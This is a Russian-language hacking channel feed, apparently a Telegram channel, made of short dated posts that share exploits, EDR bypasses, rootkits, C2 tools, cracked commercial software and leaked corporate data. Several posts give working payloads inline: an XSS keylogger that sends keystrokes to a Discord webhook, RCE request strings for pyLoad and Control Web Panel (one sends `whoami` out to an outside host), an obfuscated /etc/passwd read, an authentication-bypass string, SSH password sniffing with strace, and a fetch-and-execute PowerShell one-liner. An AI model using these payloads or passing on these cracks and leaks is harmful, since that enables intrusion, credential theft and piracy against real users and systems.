backdoor и shellCode билдер под разные архитектуры (0x001)hackebds#shellcode #backdoor #arch
2023-02-08 18:19:07
UnhookingPatchОпять byPass опять EDRПюрешка с котлеткой#win #edr
2023-02-08 10:05:02
NetworkNightmareВеликолепный Магама AKA @c4s73r в рамках сетевого беспредела опубликовал свои труды на благословенной гитхабе.С чем поздравляем и поддерживаем ! 😜NetworkNightmare#подрывУстоев #network
2023-02-08 04:43:03
LFI
2023-02-07 05:17:33
exploit для активно эксплуатируемой уязвимости нулевого дня, затрагивающий консоли администрирования GoAnywhere MFT.readshodan - total 1000exploit
2023-02-06 16:20:44
Лол))))) SSRF
2023-02-06 15:45:05
Nidhogg rootkitВиндовый rootkit написанный на C++, по заявлению авторов сильно дружит с любыми версиями win 10 и win 11. Так же руткит можно примотать синей изолентой к своему C&C и долго медитировать на бегущий трафик.Скачать тут#rootkit #windows #redteam
2023-02-06 15:24:21
Картоха ! from Service to SYSTEMRasmanPotatodownload#windows #priv
2023-02-06 13:11:51
CVE-2022-44268Arbitrary File Read PoC - PNG generatorPoC
2023-02-06 09:48:19
BypassAVкарта с основными методами обхода антивируса и EDR.MAP
2023-02-05 07:00:54
DevOps игры (в рамках эксперимента воскресенья)*devops.gamesdevopspartygamesoverthewire (linux war games)ohmyGITcodingame
2023-02-05 06:06:59
SCRIPT HTTP-SQL-INJECTION (NMAP)download
2023-02-04 16:36:09
BurpSuiteSharpenerdownload
2023-02-04 10:21:12
CVE-2023-25135vBulletin - RCE + exploitman+exploit#exploit #vBulletin
2023-02-04 08:55:30
RATникиВчера мы говорили про мартицы C&C серверов\фреймворковА сегодня про матрицу RATТут хватит всем #rat
2023-02-04 08:47:58
CVE-2023-0045Bypassing Spectre-BTI User Space Mitigations on Linux
2023-02-04 07:21:24
Acunetix Premium v15.3.230123162_Win x64+crack
2023-02-03 21:27:46
NTDLLReflectionОбход перехватчиков EDR Userland путем загрузки Reflective Ntdll в память с удаленного сервера на основе Windows ReleaseID, чтобы избежать открытия дескриптора для ntdll и активировать экспортированные API-интерфейсы из таблицы экспорта.*В общем очередной (свежий) ByPassdownload#windows #bypass
2023-02-03 16:34:34
CobaltStrike ? НЕТ !Тут хватит всемВпрочем об альтернативах мы уже писали несколько раз#C2 #c&c
2023-02-03 03:42:01
IBM Aspera Faspex - Pre-Auth RCE+ exploit coderead and run
2023-02-02 20:04:27
Я просто оставлю это здесь - ЫТЬ CVE-2022-44268 POC
2023-02-02 16:31:02
CVE-2023-21608 - RCE - Adobe Acrobat ReaderVideo proofpass: proxy_bar#exploit #rce #acrobat
2023-02-02 09:37:51
Художественный фильм "спиз.." "golden certificates"*certsync - это новая техника для удаленного дампа NTDS, но на этот раз без DRUAPI: он использует золотой сертификат и UnPAC хеш. * domain admin - не нужен, хватит и CA admindownload#windows #cert
2023-02-02 05:27:00
RedTeam-ToolsИнструменты и техники для Red TeamИмеровover 100 toolsdownload#red #pentest #tools #man
2023-02-01 04:52:25
PassTheCertаутентификация на сервере LDAP/S с сертификатом через SchannelПока в виде концепта, но уже интересно
2023-02-01 04:33:26
CVE-2023-23924 библиотека Dompdf - RCECVSS score: 10 !!!Конкретнее о дырке тут#php #vuln #poc
2023-01-31 16:30:16
exploit for VMware vRealize Log InsightTechnical Deep Divedownload EXPLOIT#exploit #vmware
2023-01-31 04:59:22
D1rkLrd - свежее1 - Shellcode Loader with Indirect Dynamic syscall Implementation2 - shellcode in MAC format3 - API resolving from PEB4 - Syscall calll and syscall instruction address resolving at run timedownload#windows #shellcode
2023-01-31 04:47:53
CVE-2022-25765 - PDFkit-CMD-InjectionПодробности дырки тутexploit#exploit
2023-01-31 04:36:55
УтрыDecompiler Explorer
2023-01-30 15:12:16
Tangled WinExecКрайне интересно, загляните в папку ReflectiveDLLInjectionпосмотреть
2023-01-30 13:34:05
BypassCredGuardОбход Credential Guard через исправление памяти Wdigestdownload#windows #bypass
2023-01-29 19:59:11
MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated)exploit#myBB
2023-01-29 17:37:26
Может лучше не ставить этот ваш windows 11 ?Скоро придется компьютер клеткой Фарадея накрывать, а вместо инета - юзать диод данных. *Ну так вот, объемный гайд по ОТКЛЮЧЕНИЮ ТЕЛЕМЕТРИИ и всякого зла от мелкомягких.*Windows 11 Debloat / Privacy Guide
2023-01-29 12:08:58
PHP Development Server <= 7.4.21 - Remote Source Disclosureread#php #vuln
2023-01-29 10:59:43
Exploit for full access to disk C:\ (for all users) pass: proxy_bardownload#exploit #C #windows
2023-01-29 08:28:56
Invicti 2023 + REG file (бывший NetSparker)*archive Pass: proxy_bar
2023-01-28 21:09:09
sshd_backdoor*/root/.ssh/authorized_keys evil file watchdog with ebpf tracepoint hook. Прикольно, а я все по старинке PAM модули прописываю, да и руткиты под *nix тем же занимаются.download#ssh #bckdoor
2023-01-28 08:49:33
Будьте бдительны, скамеры не спят
2023-01-28 06:00:00
Kali-PurpleThe ultimate SOC-in-a-box community project*1. Practice Ops: Virtualization, firewalls, VLAN, WAF, SIEM, IDS/IPS, ...2. Practice Red: Penetration testing of vulnerable machines while seeing what the blue team sees. 3. 3. Can you become stealthier?4. Practice Blue: Firewall and IPS rules, SIEM analysis and dashboard development, ...5. Purple teaming: Red and Blue working together to develop the ultimate set of rules6. Protect: Deploy Kali-Purple to protect your networkdownload
2023-01-27 19:16:44
Пост восхваления хакера Raptor (ака Marco Ivaldi)Нужно отдать должное, как никак человек жизнь положил на алтарь exploit research.Ознакомьтесь с его github/0xdea и сплоитами которые он писал больше 20 лет - всегда бывает полезно глянуть в историю.#deadcow
2023-01-27 05:06:23
cat /etc/passwd16bit format{\c''\a""t,/e''*?/?a?s??}или{\c''\a""\t,/\e''*?/\p*\d}
2023-01-26 16:48:31
Слово "консультант" - предполагает под собой отказ от ответственности ? )))😁
2023-01-26 14:21:26
CVE-2022-34689Windows CryptoAPI spoofing vulnerability.Дырку в сыре обнаружили АНБ и NCSC Великобритании, она позволяет подделывать сертификаты коллизии MD5 и вообще манипуляции с сертификатом x.509. Exploit#windows #x509
2023-01-26 04:44:37
Yandex Git repository leaked *Несколько часов опубликовали 40Gb+ протекшего GIT-репозитория Яндекса.а именно:aapi.tar.bz2admins.tar.bz2ads.tar.bz2alice.tar.bz2analytics.tar.bz2antiadblock.tar.bz2antirobot.tar.bz2autocheck.tar.bz2balancer.tar.bz2billing.tar.bz2bindings.tar.bz2captcha.tar.bz2cdn.tar.bz2certs.tar.bz2ci.tar.bz2classifieds.tar.bz2client_analytics.tar.bz2client_method.tar.bz2cloud.tar.bz2commerce.tar.bz2connect.tar.bz2crm.tar.bz2crypta.tar.bz2customer_service.tar.bz2datacloud.tar.bz2delivery.tar.bz2direct.tar.bz2disk.tar.bz2docs.tar.bz2drive.tar.bz2extsearch.tar.bz2fuzzing.tar.bz2gencfg.tar.bz2groups.tar.bz2helpdesk.tar.bz2infra.tar.bz2intranet.tar.bz2investors.tar.bz2it-office.tar.bz2jupytercloud.tar.bz2kernel.tar.bz2library.tar.bz2load.tar.bz2mail.tar.bz2maps.tar.bz2maps_2.tar.bz2maps_adv.tar.bz2market.tar.bz2metrika.tar.bz2mobile-WARNING-notfull.tar.bz2nginx.tar.bz2noc.tar.bz2partner.tar.bz2passport.tar.bz2pay.tar.bz2payplatform.tar.bz2paysys.tar.bz2portal.tar.bz2robot.tar.bz2rt-research.tar.bz2saas.tar.bz2sandbox.tar.bz2search.tar.bz2security.tar.bz2skynet.tar.bz2smart_devices.tar.bz2smarttv.tar.bz2solomon.tar.bz2stocks.tar.bz2tasklet.tar.bz2taxi.tar.bz2tools.tar.bz2travel.tar.bz2wmconsole.tar.bz2yandex_io.tar.bz2yandex360.tar.bz2yaphone.tar.bz2yawe.tar.bz2frontend.tar.bz2
2023-01-25 15:23:50
CVE-2023-23504 - Apple products*Протекает dlil.c XNU который обрабатывает сетевые интерфейсы, вызванный целочисленным переполнением (uint16_t) в if.c. Всего лишь надо то создать 65536 сетевых интерфейсов.
2023-01-24 13:59:48
Фу, блин, Но POC есть POC CVE-2023-22960Обод механизма предотвращения подбора учетных данных встроенного веб-сервера (интерфейса) более чем 60 моделей принтеров Lexmark.*Фор Даунлоаде зысис щит, фолоу ту зэ линк, май френд
2023-01-23 09:00:31
LPE - Solaris 10Злоупотребление в dtprintinfo*Есть такой ресёрчер Marco Ivaldi (дохлая корова) который шлепает сплоиты с бородатого 2000 года, хоть соляру сейчас найти сложно, но все равно красивоexploit
2023-01-22 12:19:03
Это может быть интересноADReplStatus*Active Directory Replication Status Tool, aka ADREPLSTATUS - 2023download
2023-01-22 11:45:38
For BurpSuiteAPIKit:Discovery, Scan and Audit APIs Toolkit All In One.download#Burp #plugins
2023-01-22 11:17:58
SugarCRM 0-day Auth Bypass + RCE Exploit
2023-01-22 09:13:28
CVE-2023-0398 modoboa - mail ServerCSRF приводит к удалению домена*usage fot BURP:<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1:8000/admin/domains/4/delete/"> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body></html>read
2023-01-21 13:38:56
переоформим !
2023-01-21 13:17:38
CVE-2023-0179 PoCэксплойт для уязвимости в Nftables, затрагивающий все версии Linux от 5.5 до 6.2-rc3, хотя эксплойт тестировался на свежем ядре 6.1.6Понять глубину#linux #kernel #lpe #nftables
2023-01-21 11:11:28
Microsoft Teams - RCEdownload
2023-01-21 08:15:18
Коннектимся!
2023-01-21 05:34:17
RDPAsynchronous RDP client for Python (headless) *Ну Вы понимаете, да ? )))подобрать
2023-01-20 17:03:12
Если я пойду и долиною смертной тени, не убоюсь зла, потому что Ты со мной openAI;Твой жезл и Твой посох - они успокаивают меня. Ты приготовил предо мною трапезу в виду врагов моих; умастил елеем голову мою; чаша моя преисполнена.BOT off как вы поняли
2023-01-20 14:35:30
Wolfenstein 3D CGAТут и описание то не нужно. забрать#wolf #90
2023-01-20 05:22:32
В продолжении темыПоявился nuclei-template для дыры CVE-2022-47966.yamlНу и сам nuclei забрать тут****Bonus для blueTeam - правило обнаружения эксплуатации дыры для Sigma - забрать
2023-01-19 19:37:32
Exploiting null-dereferences in the Linux kernel Интересное#linux #kernel
2023-01-19 18:50:00
SUDO KILLERТулза для выявления и использования неправильных конфигураций и уязвимостей правил sudo для повышения привилегий Linux.download
2023-01-19 16:23:57
Чаты и каналы Telegram по информационной безопасности 2023 Хорошая подборочка over 100, но нас в ней нет ((Забираем
2023-01-19 14:43:56
CVE-2022-47966*Список ПО от ManageEngine подверженных атаке поражает !* Уязвимость позволяет удаленное выполнение кода, отправив HTTP-запрос POST, содержащий вредоносный ответ SAML. А всё из за не патченной версии Apache Santuario для проверки подписи XML.*read*POC/exploit*Usage:python3 CVE-2022-47966.py --url https://10.0.40.64:8080/SamlResponseServlet --command notepad.exe
2023-01-19 08:44:14
CVE-2023-22809 - опять Sudo, опять bypass😏#Unix #linux #sudo #bypass
2023-01-18 11:38:40
NGINXConfigСамый простой способ настроить производительный, безопасный и стабильный NGINX сервер.Ну вдруг вам нужно, натыкали галочек, получили конфиг.НаТыкать#nginx
2023-01-18 04:35:35
CVE-2022-46463 Проблема контроля доступа в Harbour v1.X.X–v2.5.3 позволяет злоумышленникам получать доступ к общедоступным и частным репозиториям без аутентификации.Вообще Харбор крутая штука, для devops\devsecopsexploit#harbor #repo
2023-01-17 12:35:40
ОТСТАВИТЬ ПАНИКУБОТ был и останется бесплатным.Сейчас тестируются новые фичи. К вечеру все будет доступно в одном из двух вариантов:1. Допуск по телеграмм id для всех желающихили2. Допуск как и раньше, но с таймаутом сообщений в 30 сек3. симбиоз первого и второго варианта
2023-01-17 09:42:13
CVE-2023-0297Pre-auth RCE in pyLoadreadExploit Code:curl -i -s -k -X $'POST' \ --data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \ $'http://<target>/flash/addcrypted2'
2023-01-17 09:22:32
Windows Kernel Elevation of Privilege Vulnerability.CVE-2022-21881cve-2022-21881-io_completion-poc.cpp
2023-01-16 16:41:53
ChatGPT - для RedTeam и BlueTeamГодная статья с хорошими примерами Читать OpenAI ChatGPT for Cyber SecurityЕсли нет учетки OpenAI - попробовать свои силы можно в нашем боте#openAI
2023-01-15 05:22:05
Cellebrite & MSABДанные от Cellebrite и MSAB, двух компаний, которые предоставляют правительствам инструменты для взлома телефонов, были слиты.*Утечка включает в себя фактическое программное обеспечение, а также документацию.*Эти инструменты использовались против журналистов, активистов и диссидентов по всему миру.
2023-01-15 04:33:49
next generation Firewall - а главное, надежный 😜
2023-01-14 07:32:22
chatGPT openAIпока в режиме тестаproxy_bar_openAI_bot#openAI #chatGPT #skynet
2023-01-14 05:04:20
ExplorerPersistперехват загрузки cscapi.dll и как итог - внедрение "нашей" dll с "нашим" функционалом.Ну а Persistence в том что отрабатывает каждый раз при запуске проводникаdownload
2023-01-13 11:57:53
Сжато, ёмко, всеобъемлюще, БАЗА !!!))))Для этих гребаных web-мастеров - motherfuckingwebsite.comЭтому не научат на курсахЧто то даже БаШорг вспомнился версии 2004 года....#humor #web #lol
2023-01-13 09:53:55
охх))) RecycleBin снова в деле ! ) RecyclePersist
2023-01-13 09:00:18
Новость по утечке в mail.ru - шляпа.И ничего полезного в ней нет. Разве что чисто на прозвон3505917 строк
2023-01-13 04:43:48
CVE-2022-3656*Затронуто более 2,5 миллиардов пользователей Google Chrome и браузеров на базе Chromium.Эта уязвимость позволяет украсть конфиденциальные файлы, такие как зашифрованные кошельки и учетные данные облачного провайдера.
2023-01-12 05:09:08
CVE-2023-21752Свежайшая Дыра (от 10 января) в службе резервного копирования WindowsLPE от юзера до системыAbout vulnexploit#windows #exploit #lpe
2023-01-11 18:14:45
CVE-2023-0210В новый год, с новыми дырамиFlaw in Linux Kernel Allows Unauthenticated remote DOS AttacksPOC - ручками наберете#linux #kernel
2023-01-11 17:53:04
Списки docker образов для прокачки Пентестаfor pentesterts
2023-01-11 05:33:46
Активация windows и officeБыстрый способ без всяких KMS_autousage:PowerShell от админа и вставляем:irm https://massgrave.dev/get | iex и выбираем нужный пункт, ВСЁили такНу мало ли Вам нужно.
2023-01-11 05:05:42
Exploit for CVE-2022-20452 privilege escalation on Android from installed app to system app (or another app)downLoad#android #exploit
2023-01-10 12:50:56
ChatGPT Ultimate Resource Guide WoW
2023-01-10 10:40:34
Атаки на банкоматы с использованием вредоносного ПОAzaZAвсе как вы любите
2023-01-10 10:35:07
Chrome-V8 RCEexploit
2023-01-10 05:03:27
ChatGPT_PoC - продолжаем наблюдение ))))#openAI
2023-01-10 04:37:59
CVE-2022-31705POCGeekpwn 2022 Vmware EHCI OOBdownload
2023-01-09 13:00:00
CVE-2022-41076The OWASSRF + TabShell exploit chaintabshell_poc.ps1
2023-01-09 11:05:21
Kerberos attacks 1-Kerberoasting AzaZa#Kerberos
2023-01-08 17:17:57
CVE-2022-44877Control Web Panel Unauth RCEPOC usage:POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Host: vulnContent-Type: application/x-www-form-urlencodedusername=root&password=toor&commit=Login
2023-01-08 11:20:47
Расходимся, мы тут лишниечитать всю статью
2023-01-08 09:28:55
Malware Analysis Series (MAS): Article 7Опа, седьмая часть вышла !PDF#malware #destroy #happy
2023-01-08 05:34:03
FilelessNtdllReflectionЕще один Bypass Userland EDRdownload#bypassEDR
2023-01-07 06:40:03
ААА сука, в голосину)))))))))))))))Linux find Windows 10/11 OEM product key command*Был ноут с windows, поставили linux, но ключ от винды хотим "подарить" ?)))sudo cat /sys/firmware/acpi/tables/MSDM | tail -1Смешное
2023-01-07 06:31:29
UnhookingPatchBypass EDR download
2023-01-06 17:09:37
Ребята, всем привет !!!!Прошел НОВЫЙ ГОД и вот вот наступит рождество !!!А это значит что PROXY_BAR всех Вас поздравляет, желает удачи, здоровья и взлома без последствий )))))В общем с праздниками ВАС )))))*****Ну и если Вам нравится то что мы делаем, Вы можете нас поддержатьBitcoin bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k
2023-01-06 15:05:21
PhpMyAdmin Setup - доступен без аутентификации )))****1. ищем хосты через shodan и censys2. все IP сканим на на ниличие службы ПХПмайАдмин3. wappalyzer покажет php, лучше использовать php.txt 4. phpMyAdmin/setup найден ))
2023-01-06 07:10:07
CVE-2022-44877Centos Web Panel 7 Unauthenticated Remote Code Executiondownload#centos #rce
2023-01-06 05:08:50
OFFENSIVE SECURITY & REVERSE ENGINEERING (OSRE) Coursedownload
2023-01-05 20:15:02
Alcatrazдвоичный обфускатор под x64, способный запутывать различные PE-файлы, включая:.exe.dll.sysdownload
2023-01-05 12:25:55
Shellcode MutatorПрячемся от сигнатур !downloadusage:mutate.py [-h] [-t SHELLCODE_TEMPLATE] [-s SHELLCODE_FILE] [-m MORPH_PERCENTAGE] [-v] [-x86]#shellcode #Morphin
2023-01-05 10:06:47
Casper-fs Это генератор пользовательских скрытых модулей ядра Linux. Каждый модуль работает в файловой системе для защиты и сокрытия секретных файлов. Понимаете ?)))*download*video
2023-01-04 19:26:04
Gepetto: IDA plugin which queries OpenAI's ChatGPT to explain decompiled functionsdownload#ida #ai
2023-01-04 13:10:19
exploit for CVE-2022-46164 осознать
2023-01-04 12:49:44
Выносите святых, опять спулер (стар, но автоматичен)#windows #spooler #exploit #for_fun
2023-01-04 12:44:10
Exploiting CVE-2022-42703 - Bringing back the stack attack Когда протекает память - почитать#linux #memory #exploit
2023-01-04 12:38:35
RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypassread_look
2022-12-29 05:25:32
Kernel Exploits Recipes Notebookread#linux #kernel #exploit
2022-12-28 05:40:26
WebKit+Kernel exploit chain for all PS Vita firmwares Ну вдруг вам нужно)download
2022-12-27 17:57:00
Hidden firewall in Linux KernelКак дополнительный рубеж безопасности для сервера*ReadME*DownloadME*WatchMe
2022-12-27 13:07:48
Коллекция Exploits - MacOS*CVE-2022-22583CVE-2022-22616CVE-2022-22639CVE-2022-26690CVE-2022-26712CVE-2022-26728CVE-2022-32786CVE-2022-32800*download#exploit #macOS
2022-12-27 05:21:23
Force AdminСоздаем бесконечные запросы UAC, заставляющие пользователя работать от имени администратора. Лол, ну то есть админа тупо достали)))) как достать соседаdownload
2022-12-25 15:06:37
Рубрика - нам пишутHey, I've got pretty cool project that you could put on proxybar*Shellcodevэто инструмент, предназначенный для помощи в автоматизации создания шелл-кодов.download#shellcode
2022-12-25 09:48:28
Linux kernel exploit development*book#exploiting #linux
2022-12-24 17:08:03
CVE-2022-42046 Наконец то опубликовалиlocal privilege escalation POC download#windows #lpe #poc
2022-12-23 10:58:54
Wordpress - XSS ( CVE-2022-29455)/wp-content/plugins/elementor/assets/js/frontend.min.jsusage:https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==#wordpress #xss
2022-12-23 10:52:01
XSS Payload - Discord Keyloggerusage:<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>#discord #xss
2022-12-23 07:48:50
Linux Kernel RCE (ksmbd)*CVSS SCORE: 10 из 10*Детали тутПатч прилетел в ядро только в ветке 5.15.61#10из10
2022-12-22 11:14:45
Охота на C2 C&C сервераПонимание работы и обнаружение фреймворков C2 (C&C) *1. Understanding & Detecting C2 Frameworks — TrevorC22. Understanding & Detecting C2 Frameworks — Ares3. Understanding & Detecting C2 Frameworks — HARS (HTTP/S Asynchronous Reverse Shell)4. Understanding & Detecting C2 Frameworks — BabyShark*BonusTrack:Download BabyShark#C2 #hackers #botnets
2022-12-22 06:29:41
CVE-2022-2602 - exploitОпубликован PoC Kernel Privilege Escalation Linux*О чем это, прочитать тут_1 и тут_2*POC (точнее два) - забратьExploit - забрать#linux #kernel #exploits
2022-12-22 06:19:25
Оценка уязвимостей с помощью Nmap ?Вам нужен ВУльтерВьюер ! *Из коробки умеет:Server IP addressNetwork port numberNetwork port statusProtocol used by the network portNetwork service operating on the network port and its versionVulnerability CVE-identifierVulnerability ratingURL-link to the description of the vulnerability on the platform Vulners.comЗаказывайте прямо сейчас с уникальной финкой лгбтDownload
2022-12-21 14:17:14
log4j ДА, еще один, но попрощеusage:python3 hik.py https://localhost:443 xxx.oastify.com:80downLoad
2022-12-21 14:01:37
Php Remote file Inclusion and RCE in flatpressblog/flatpressProof of Concept#php #vuln
2022-12-21 08:40:36
CloudmareПалим реальные IPадреса сайтов защищенных Cloudflare, Sucuri или Incapsula.Но таки да - работает только если криво настроен DNS.download
2022-12-21 08:14:02
Атаки на web-приложения на JAVAЭто обучающий проект, время от времени обновляется. Проект стремится поделиться технологиями, связанными с безопасностью Java, в краткой и ясной форме, упростить некоторые сложные технические вопросы и позволить изучить безопасность Java.download*Bonus trackJar AnalyzerGUI для анализа файлов JAR, особенно подходящий для анализа безопасности кода. download#java #security #web #hack
2022-12-20 11:20:07
Только ВАЖНЫЕ вопросы ! #hackers #xss
2022-12-19 11:24:38
linux injectorИнжектим в общие библиотеки x64 Linux. (без ptrace - а то на ptrace root права нужны, а права повышать в системе в падлу)usage:linux_injector <pid> <module>Да да, все так просто, иди уже.download
2022-12-19 11:17:54
powershell-obfuscationОбфускатор Powershell anti-kill, простой и эффективный, проходит все VT (когда трава была зеленее)download
2022-12-18 10:45:29
MacDirtyCowDemПолучаем root в macOS 13.0.1 через CVE-2022-46689exploit#root #macos #exploit
2022-12-17 14:55:29
Dirty Vanityновая техника внедрения, злоупотребляющая Windows fork API для обхода EDR.Слайды тутPOC тут#windows #bypass #edr
2022-12-16 13:39:36
Бэкдоры в FreePBXPHP бэкдор, который добавляет своего пользователя (mgknight), удаляет законных юзеров, кодируется в base64 и переписывает .htaccess - встречайте на ваших серваках телефонии)))Пятничное расследование читать#freepbx #backdoor
2022-12-16 09:42:00
CVE-2022-28672Foxit PDF Reader Remote Code Execution Exploit (NOT POC))))
2022-12-16 09:38:19
Super XrayWeb Vulnerability Scannerdownload#web #vuln #scanner
2022-12-16 09:30:54
Большая коллекция WEBSHELLSНа asp, aspx, php, jsp, pl, py, etcdownload#webshell
2022-12-16 06:32:14
CVE-2022-45451 Acronis POCdownload
2022-12-16 03:42:30
Privilege Escalation Vulnerabilities (UNIX Insecure File Handling) *1. UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging2. UNIX Symlink Following and Race Condition in Hardware Reporting 3. UNIX Symlink Following and Race Condition in System Log Feature of saposcol4. UNIX Symlink Following in Log File Creation of saposcol5. UNIX Symlink Following in Shared Memory Dump File Creation of saposcol#linux #privesc #sec
2022-12-16 03:11:03
DirCreate2SystemПолучаем NT AUTHORITY\\SYSTEM*Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.*DOWNLOAD POC#windows #escpriv #POC #system
2022-12-16 03:00:35
Пятничная викторина )))#docker #vuln
2022-12-15 07:56:38
SIEMSIEM Tactics, Techiques, and Procedures read
2022-12-09 10:00:40
Перехват системных вызовов в Windows 11 22H2 like Avast Antivirus.Исследование, анализ и обход.Learn#windows #syscall #bypass
2022-12-09 09:50:48
DCOMPotatoКоллекция эксплойтов /повышения привилегий службы DCOM.*doownload#exploit #dcom
2022-12-09 06:44:51
Ну во первых с пятницей.А во вторых, Я тебя сука по IP вычислю*только для образовательных целей (нет)#track #ip #deanon
2022-12-08 19:56:26
в предложку кстати
2022-12-08 13:59:41
Defender Exclusions BOFХороший пример того, что defender отключать не обязательно, достаточно определить "исключения" ииии воспользоваться ими )))0_щ
2022-12-08 13:42:39
CVE-2022-2414Дырка в pki-coreуязвимость позволяет удаленному злоумышленнику получить содержимое произвольных файлов, отправив специально созданные HTTP-запросы.
2022-12-08 08:52:08
Получаем пароль от SSH в открытом виде*1. получаем точный идентификатор sshdpgrep -l sshd2. Отслеживаем системные вызовы strace -f -p <ssh_PID> -e trace=write -o capture#ssh #sniff #password
2022-12-08 08:14:33
CVE-2022-29596MicroStrategy Enterprise Manager 2022обходим аутентификацию, вызывая ошибку входа в систему, а затем вводя:Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=_any_password_&ConnMode=1&3054=Login#microsoft #bypass
2022-12-08 07:51:03
RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypassread
2022-12-07 12:58:39
Burp Suite PRO version 2022.12.2
2022-12-07 06:30:34
PentagridSMS-шлюз с открытым исходным кодом для пентест проектовreadinstall and run#gsm #gateway #sms #2G/3G/4G/5G
2022-12-07 06:04:44
Random C2 Profile Generatorдля cobalt-strikedownload#cobalt
2022-12-07 05:33:30
PENTESTING BIBLE
2022-12-06 10:33:45
Linux PrivEscЗлой CRON для самых маленьких - тут#linux #cron #esc
2022-12-06 07:17:51
Bug Bounty Wordlistsdownload
2022-12-05 11:57:02
концепция удаления/записи произвольного файла в Sysmon (CVE-2022-41120/CVE-2022-XXXXX)download POC#windows #LPE #poc
2022-12-05 07:13:32
The Defender’s Guide to the Windows Registryread#widows #defender #registry
2022-12-04 17:44:16
Black Hat 2022 USA/ASIA/EuropeвидеоUSAASIAEUROPE
2022-12-02 14:24:38
Recon Methods*part 1 - OSINT Host Discoverypart 2 - OSINT Host Discovery Continuedpart 3 - OSINT Employee Discoverypart 4 - Automated OSINTpart 5 - Traffic on the Target#cybersec #recon
2022-12-01 20:21:12
WindowSpyЭто такой Cobalt Strike Beacon который "узконаправленно" следит за действиями пользователя (открытие определенных документов, вкладки браузера, vpn коннекты и тд).Такая движуха повышает скрытность и снижает обнаружение. Значит - маст хэв.download #cobaltstrike #module
2022-12-01 14:22:21
The Linux Kernel Module Programming GuideNovember 10, 2022read
2022-12-01 08:33:15
Microsoft Exchange ProxyNotShell RCEНе POC, а полноценный официальный exploit для metasploitdownload#rce #exploit #microsoft #metasploit
2022-12-01 08:18:50
RCE root-уязвимость в утилите ping, поставляемой во FreeBSDCVE-2022-23093read
2022-11-30 08:44:00
такое конечно, но актуальнее с каждым днем
2022-11-30 08:10:51
модуль Metasploit для удаленного управления для развертывания полезной нагрузки и запуска ее с сервераRemote Control Collection Remote Code Executiondownload#exploit #remote
2022-11-29 16:07:20
Vulnerability Feed#vuln #exploits
2022-11-29 10:27:50
regex GitHub Dorks /ssh:\/\/.*:.*@.*target\.com/ /ftp:\/\/.*:.*@.*target\.com/
2022-11-29 05:42:49
SpartacusDLL Hijacking Discovery ToolТот спартак вроде оскар получил)) #dll
2022-11-29 05:35:29
Рановато, но таки даТОП 10 из 20221. Follina (CVE-2022-30190)2. Log4Shell (CVE-2021-44228)3. Spring4Shell (CVE-2022-22965)4. F5 BIG-IP (CVE-2022-1388)5. Google Chrome zero-day (CVE-2022-0609)6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)9. Atlassian Confluence RCE flaw (CVE-2022-26134)10. Zyxel RCE vulnerability (CVE-2022-30525)
2022-11-25 07:18:33
Malware Analysis Seriespdf
2022-11-25 07:13:29
Ох лоооол)))0day fanslink
2022-11-22 19:23:00
MEGA 6500%в июне 2022 года я обнаружил уязвимость в системе облачного хранения MEGA, которая позволяла мне хранить больше данных, чем разрешено для бесплатных учетных записей. Мне удалось сохранить примерно 1300 ГБ данных в MEGA, несмотря на то, что ограничение на бесплатное хранилище для MEGA составляет 20 ГБ.Видела ман в сентябре, там был другой подход !Через яндекс фотки можно было попась в яндекс деньгиПочитать стори
2022-11-22 13:37:53
Для Red Team*Red Team Management by JoasAwesome Red Team by yeyintminthuhtutAwesome Red Team Operations by Joas
2022-11-22 12:57:04
CVE-2022-41924 RCE in Tailscale (vpn service)занятный research#vpn #rce #research
2022-11-22 07:49:05
wireguard-initramfs*Включает wireguard во время загрузки ядра до монтирования зашифрованных разделов. В сочетании с dropbear это может обеспечить ПОЛНОСТЬЮ ЗАШИФРОВАННУЮ удаленную загрузку без хранения ключевого материала.Вообще есть конечно способы проще, но мало ли кому пригодится.download#security #linux
2022-11-22 05:55:19
ViperSoftX: Hiding in System Logs and Spreading VenomSoftXна почитать
2022-11-22 04:53:34
просто положу тутcypherhound
2022-11-22 04:38:39
Прикольнопроверить, подвержены ли вы известной уязвимости в вашем оборудовании (ЦП) при использовании Linux, бонусом статус устранения:grep -r . /sys/devices/system/cpu/vulnerabilities/
2022-11-22 04:15:09
Active Directory Attack Cheat SheetRead#AD #attack
2022-11-18 09:41:21
